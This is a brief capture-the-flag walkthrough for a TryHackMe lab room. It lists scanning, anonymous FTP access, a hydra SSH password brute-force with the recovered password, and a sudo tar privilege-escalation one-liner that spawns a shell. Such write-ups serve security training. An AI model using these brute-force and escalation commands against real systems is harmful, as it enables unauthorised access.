Bounty Hunter

Room Link: https://tryhackme.com/room/cowboyhacker

Scanning

Initial Scan

nmap -A $VICTIM

Scan all ports

No other ports found.

nmap -p- $VICTIM

TCP/80 - HTTP

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 

TCP/22 - SSH

anonymous login works

Kali

ftp $VICTIM
Username: anonymous

Kali

hydra -l lin -P locks.txt ssh://$VICTIM
Username: lin
Password: RedDr4gonSynd1cat3

Kali

ssh lin@$VICTIM

Privlege Escalation

Exploit Link: https://gtfobins.github.io/gtfobins/tar/

Victim

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Last updated